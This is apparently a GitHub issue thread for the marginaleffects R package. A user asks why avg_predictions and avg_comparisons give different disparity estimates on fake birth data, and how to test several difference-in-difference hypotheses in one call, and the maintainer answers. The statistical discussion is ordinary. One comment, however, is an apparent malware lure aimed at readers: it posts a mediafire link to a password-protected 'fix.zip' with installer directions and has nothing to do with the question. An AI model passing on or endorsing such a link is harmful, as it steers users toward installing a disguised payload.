### ISSUE TITLE
Confusion about how to code hypotheses regarding a difference and a difference of a difference

### ISSUE THREAD

**Issue by eipi10** [vincentarelbundock/marginaleffects#1199]
I'm working with U.S. Vital Statistics birth data and I'm looking at disparities in outcomes by race, and also whether the size of any disparity changed from one period ("before") to another ("after"). 

I've been trying to use `avg_predictions` and `avg_comparisons` and am confused about why I'm getting different results in cases where I would have thought the results would be the same. I'd also like to find out if there's a way to get several parallel `hypothesis` results returned with one call to the relevant function, rather than hardcoding each hypothesis separately (e.g., `"b2 = b1"`, `"b4 = b3"`, etc. 

Below is a reproducible example with fake data that mimics the essential features of the real data.

``` r
library(tidyverse)
library(marginaleffects)

# Create fake data
n=1e4
set.seed(4857)
fake.data = tibble(
  mother.race = sample(c(c(0,1,3)), n, replace=TRUE, prob=c(0.5, 0.35,0.15)),
  mother.nativity = sample(0:1, n, replace=TRUE, prob=c(0.8,0.2)),
  time=sample(0:1, n, replace=TRUE),
  v1 = rnorm(n),
  v2 = rnorm(n))

# Add the outcome
fake.data = fake.data %>%
  mutate(
    outcome = 0.3*mother.race - 0.5*mother.nativity + 0.8*time +
      0.1*time*mother.race + 0.2*time*mother.race*mother.nativity +
      0.2*v1 - 0.3*v2 + rnorm(n(), 0, 2)
  )

# Convert numeric codes to category names
fake.data = fake.data %>%
  mutate(mother.race = recode(mother.race, "0"="White","1"="Hispanic","3"="Black") %>%
           fct_relevel(., "White"),
         mother.nativity = recode(mother.nativity, "1"="U.S.-born", "0"="Foreign-born") %>%
           fct_relevel("U.S.-born"),
         time = recode(time, "0"="Before","1"="After") %>% fct_relevel("Before")) %>%
  arrange(mother.nativity, time, mother.race)
```
Fit the model with the fake data
```r
m1 = lm(outcome ~ mother.race + mother.nativity + time + mother.race*mother.nativity*time + v1 + v2,
        data=fake.data)
```

Get average prediction for each sub-group of `mother.nativity`, `mother.race` and `time`:

```r
avg_predictions(
  m1,
  by=c("mother.nativity", "mother.race","time")
)
#>
#>  mother.nativity mother.race   time Estimate Std. Error      z Pr(>|z|)     S
#>     U.S.-born       White    Before  -0.4876     0.0862 -5.656   <0.001  25.9
#>     U.S.-born       Black    Before   0.4110     0.1674  2.456   0.0141   6.2
#>     U.S.-born       Hispanic Before  -0.3039     0.1075 -2.827   0.0047   7.7
#>     U.S.-born       White    After    0.1637     0.0905  1.809   0.0704   3.8
#>     U.S.-born       Black    After    2.0290     0.1612 12.584   <0.001 118.2
#>     U.S.-born       Hispanic After    0.7815     0.1082  7.226   <0.001  40.9
#>     Foreign-born    White    Before  -0.0143     0.0449 -0.318   0.7504   0.4
#>     Foreign-born    Black    Before   0.9116     0.0794 11.482   <0.001  99.0
#>     Foreign-born    Hispanic Before   0.3137     0.0536  5.847   <0.001  27.6
#>     Foreign-born    White    After    0.8762     0.0443 19.791   <0.001 287.2
#>     Foreign-born    Black    After    1.9977     0.0818 24.413   <0.001 434.9
#>     Foreign-born    Hispanic After    1.2705     0.0534 23.786   <0.001 413.0
#>  (last two columns removed to shorten output)
```
Now for the first hypothesis I want to test: Within each combination of `mother.nativity` and `time`, is there a disparity between Hispanic and White or between Black and White?

Example hypothesis: `(U.S.-born, Black, Before) - (U.S-born, White, Before) = 0`. There are eight total hypotheses to test (two `mother.nativity` levels and two `time` levels (so, four combinations), and then two comparisons by `mother.race` (Hispanic - White) and (Black - White) within each combination of `mother.nativity` and `time`:

Here's a calculation of one of the those hypotheses (row 2 - row 1 in the code above):
```r
avg_predictions(
  m1,
  hypothesis="b2 - b1 = 0",
  by=c("mother.nativity", "mother.race","time")
)
#> 
#>     Term Estimate Std. Error    z Pr(>|z|)    S 2.5 % 97.5 %
#>  b2-b1=0    0.899      0.188 4.77   <0.001 19.1  0.53   1.27
```
There are eight hypotheses to test: `"b2 - b1=0"`, `"b3 - b1=0"`, `"b5 - b4=0"`, `"b6 - b4=0"`, etc. Can I get them all with one function call?

I thought that `avg_comparisons` might do this. The result below seems to be what I want. It has all eight disparities in one function call. However, note that `avg_comparisons` gives a different estimate than the call to `avg_predictions` above (0.899 above vs. 0.918 in the first row below). So, I think I must be confused about what `avg_comparisons` is doing. Does the inclusion of the `variables` argument change the slice of the data that goes into each calculation?

```r
avg_comparisons(
  m1,
  variables=list(mother.race="reference"),
  by=c("mother.nativity", "time")
)
#> 
#>         Term                     Contrast mother.nativity   time Estimate
#>  mother.race mean(Black) - mean(White)       U.S.-born    Before    0.918
#>  mother.race mean(Black) - mean(White)       U.S.-born    After     1.854
#>  mother.race mean(Black) - mean(White)       Foreign-born Before    0.910
#>  mother.race mean(Black) - mean(White)       Foreign-born After     1.113
#>  mother.race mean(Hispanic) - mean(White)    U.S.-born    Before    0.196
#>  mother.race mean(Hispanic) - mean(White)    U.S.-born    After     0.635
#>  mother.race mean(Hispanic) - mean(White)    Foreign-born Before    0.318
#>  mother.race mean(Hispanic) - mean(White)    Foreign-born After     0.392
#>  Std. Error     z Pr(>|z|)     S   2.5 % 97.5 %
#>      0.1883  4.87   <0.001  19.8  0.5488  1.287
#>      0.1849 10.03   <0.001  76.2  1.4916  2.216
#>      0.0912  9.97   <0.001  75.4  0.7313  1.089
#>      0.0930 11.96   <0.001 107.1  0.9306  1.295
#>      0.1378  1.42    0.155   2.7 -0.0741  0.466
#>      0.1410  4.50   <0.001  17.2  0.3587  0.911
#>      0.0700  4.55   <0.001  17.5  0.1811  0.455
#>      0.0694  5.65   <0.001  25.9  0.2561  0.528
```
In the code below `avg_predictions` gives the same result as `avg_comparisons`. Why doesn't `avg_predictions` below give the same results as `avg_predictions` above? Once again, I assume this is due to inclusion of the `variables` argument, but I don't understand what, specifically, is changing under the hood.
```r
avg_predictions(
  m1,
  hypothesis="reference",
  variables="mother.race",
  by=c("mother.nativity", "mother.race","time")
) %>%
  slice(4,8)
#> 
#>                                                        Term Estimate Std. Error
#>  (U.S.-born, Black, Before) - (U.S.-born, White, Before)       0.918      0.188
#>  (U.S.-born, Hispanic, Before) - (U.S.-born, White, Before)    0.196      0.138
#>     z Pr(>|z|)    S   2.5 % 97.5 %
#>  4.87   <0.001 19.8  0.5488  1.287
#>  1.42    0.155  2.7 -0.0741  0.466
```
Next question: Within each level of `mother.nativity`, does the disparity (Black - White) or (Hispanic - White) change from time="Before" to time="After"?

Example hypothesis: `(U.S-born, Black, After - U.S-born, White, After) - (U.S-born, Black, Before - U.S-born, White, Before) = 0`

So there are now four hypotheses to test. Below I use `avg_predictions` to test one of the four hypotheses. Is there a way to get all four hypotheses returned in a single function call? And do I want `avg_predictions` or `avg_comparisons` for this?

```r
avg_predictions(
  m1,
  hypothesis="(b5 - b4) - (b2 - b1) = 0",
  by=c("mother.nativity", "mother.race","time")
)
#> 
#>               Term Estimate Std. Error    z Pr(>|z|)    S 2.5 % 97.5 %
#>  (b5-b4)-(b2-b1)=0    0.967      0.264 3.66   <0.001 12.0  0.45   1.48
```

<sup>Created on 2024-08-26 with [reprex v2.1.1](https://reprex.tidyverse.org)</sup>

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by vincentarelbundock** [comment]
The reason `avg_predictions()` gives different results from `avg_comparisons()` is that the former averages across the distribution of covariates in each subgroups, whereas the latter takes the full dataset, sets counterfactual values, and averages over the full distribution of covariates. If the subgroup is different than the full data on covariates, the two will give different results.

The behavior of the `variables` argument is well documented in `?predictions`

You can do `hypothesis = "pairwise"`

**Comment by eipi10** [comment]
Thank you Vincent. For the first difference, "pairwise" and some filtering worked. The order was reversed, so I'll need to take the negative of the estimate but it's otherwise exactly was I was looking for. 

```
avg_predictions(
  m1,
  hypothesis="pairwise",
  by=c("mother.nativity", "mother.race","time")
) %>%
  filter(!grepl("U.S.*Foreign|Before.*After|Black.*Hispanic", term))
```
>```
>                                                            Term Estimate Std. Error      z Pr(>|z|)     S  2.5 %  97.5 %
> (U.S.-born, White, Before) - (U.S.-born, Black, Before)            -0.899     0.1883  -4.77   <0.001  19.1 -1.268 -0.5296
> (U.S.-born, White, Before) - (U.S.-born, Hispanic, Before)         -0.184     0.1378  -1.33    0.183   2.5 -0.454  0.0864
> (U.S.-born, White, After) - (U.S.-born, Black, After)              -1.865     0.1849 -10.09   <0.001  77.1 -2.228 -1.5029
> (U.S.-born, White, After) - (U.S.-born, Hispanic, After)           -0.618     0.1410  -4.38   <0.001  16.4 -0.894 -0.3415
> (Foreign-born, White, Before) - (Foreign-born, Black, Before)      -0.926     0.0912 -10.15   <0.001  78.0 -1.105 -0.7470
> (Foreign-born, White, Before) - (Foreign-born, Hispanic, Before)   -0.328     0.0700  -4.69   <0.001  18.5 -0.465 -0.1908
> (Foreign-born, White, After) - (Foreign-born, Black, After)        -1.121     0.0930 -12.05   <0.001 108.7 -1.304 -0.9391
> (Foreign-born, White, After) - (Foreign-born, Hispanic, After)     -0.394     0.0694  -5.68   <0.001  26.2 -0.530 -0.2583
>```

For the double difference, is there are similar way to get all the comparisons in one go? 

I can get one at a time like this:

```
avg_predictions(
  m1,
  hypothesis="(b5 - b4) - (b2 - b1) = 0",
  by=c("mother.nativity", "mother.race","time")
)
```

And I can get all four of them like this, but it's complicated and prone to error,  plus the `Term` column in the output is non-informative:

```
hyp = paste0("(b", c(5,6,11,12), "-b", c(4,4,10,10), ")-(b", c(2,3,8,9), "-b", c(1,1,7,7),")=0")

hyp %>% 
  map_df(
  ~avg_predictions(
    m1,
    hypothesis=.x,
    by=c("mother.nativity", "mother.race","time")
  ))
```

> ```
>                 Term Estimate Std. Error     z Pr(>|z|)    S   2.5 % 97.5 %
>  (b5-b4)-(b2-b1)=0     0.9667     0.2639 3.664   <0.001 12.0  0.4495  1.484
>  (b6-b4)-(b3-b1)=0     0.4341     0.1972 2.202   0.0277  5.2  0.0477  0.821
>  (b11-b10)-(b8-b7)=0   0.1956     0.1303 1.501   0.1333  2.9 -0.0598  0.451
>  (b12-b10)-(b9-b7)=0   0.0663     0.0985 0.673   0.5011  1.0 -0.1268  0.259
> ```

**Comment by vincentarelbundock** [comment]
No, I don't think there's an easy way to get all difference in differences automatically.
